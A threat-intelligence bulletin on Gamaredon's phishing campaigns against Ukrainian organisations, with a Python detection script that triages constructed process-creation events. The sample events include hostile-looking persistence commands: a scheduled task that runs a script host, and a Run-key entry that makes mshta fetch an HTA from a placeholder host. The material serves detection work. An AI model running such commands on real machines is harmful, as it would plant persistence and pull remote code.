Relentless Phishing from Gamaredon
Category: Threat Actor Activity | Industries: Critical Infrastructure, Defense, Government | Level: Tactical | Sources: SCPC - UA & The Record
The Russian state-sponsored threat group Gamaredon has been unrelenting in its phishing campaigns distributing information-stealing malware to Ukrainian organizations. Two variants of the malware have been deployed: GammaLoad, the PowerShell variant, and GammaSteel, the .NET variant. Analysis from the State Special Communications Service of Ukraine (SSSCIP) found that all GammaLoad variants observed "are VBScript droppers, that use similar obfuscation techniques (base-64 encoding, text string replacements) and are designed to abuse the trusted, signed system utilities (WMI, mshta.exe, wscript.exe, powershell.exe) in order to maintain persistence (through scheduled tasks creation, autorun registry keys modification) and download next-stage VBScript droppers from C2 servers. Each next stage downloaded payloads' specialty is communication with a different C2 server."
Gamaredon's phishing campaigns often impersonate Ukrainian officials or leverage topics tied to the geopolitical situation. The infection chain begins with the execution of an attached archive file carrying a Windows shortcut (LNK) file, which triggers a chain of LOLBin executables to download GammaLoad or GammaSteel. The malware is used to steal user credentials, exfiltrate files, and take screenshots. Most of Gamaredon's targets are organizations in critical infrastructure, defense, security, law enforcement, and government. The tempo of Gamaredon's activity is captured by a spokesperson for the Computer Emergency Response Team of Ukraine (CERT-UA): "Not a week went by that we didn't detect some new mass phishing email campaign with Gamaredon malware." CERT-UA attributed at least 70 incidents to Gamaredon in 2022.
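As an added illustration (not code from SSSCIP, CERT-UA or Anvilogic), the following triage runs over constructed process-creation events in the shape of the chain described above: a script host launched by Explorer from an archive-extraction folder, mshta.exe fetching a remote HTA, and scheduled-task or Run-key persistence pointing at a script host. All paths, task names and the example.invalid URL are constructed placeholders, not indicators from the reporting.

```python
import re

# Lowercase names of the signed system utilities the SSSCIP analysis says are abused.
LOLBINS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "wmic.exe"}
# Folders where WinRAR, 7-Zip and Explorer unpack attachments (constructed, common defaults).
ARCHIVE_TEMP = re.compile(r"\\(Temp\\Rar\$|Temp\\7z|AppData\\Local\\Temp\\Temp\d+_)", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the names of the detection rules one process-creation event matches."""
    image, parent = basename(event["image"]), basename(event["parent_image"])
    cmd = event["command_line"]
    low = cmd.lower()
    hits = []
    # 1. Script host started by Explorer from an archive-extraction temp folder (LNK in archive).
    if image in LOLBINS and parent == "explorer.exe" and ARCHIVE_TEMP.search(cmd):
        hits.append("compressed_file_execution")
    # 2. mshta.exe pulling an HTA from a remote URL (next-stage download).
    if image == "mshta.exe" and re.search(r"https?://", cmd, re.I):
        hits.append("mshta_remote_hta")
    # 3. Scheduled task whose action is a script host (persistence).
    if image == "schtasks.exe" and "/create" in low and any(b in low for b in LOLBINS):
        hits.append("schtasks_script_host_persistence")
    # 4. Autorun Run-key value pointing at a script host (persistence).
    if image == "reg.exe" and RUN_KEY.search(cmd) and any(b in low for b in LOLBINS):
        hits.append("run_key_script_host_persistence")
    return hits

def triage(events):
    """Map event index -> matched rules for every event that matched at least one rule."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}

# Constructed sample telemetry (not real IoCs) in the shape of a process-creation log.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'mshta.exe "C:\Users\u\AppData\Local\Temp\Rar$DIa0.123\order.hta"'},
    {"parent_image": r"C:\Windows\System32\mshta.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r'schtasks /create /sc minute /mo 10 /tn Upd /tr "wscript.exe C:\Users\u\AppData\Roaming\u.vbs"'},
    {"parent_image": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\reg.exe",
     "command_line": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Upd /d "mshta.exe http://example.invalid/x.hta" /f'},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\u\Documents\notes.txt"},
]

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(idx, rules)
```

Rule 1 is the noisy one in practice: legitimate users do open scripts from extracted archives, so tune the parent/path conditions against your own baseline before alerting on it alone.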
- Malicious File Delivering Malware
- HTA Payload Drop
Anvilogic Use Cases:
- Compressed File Execution
- Symbolic OR Hard File Link Created
- MSHTA.exe execution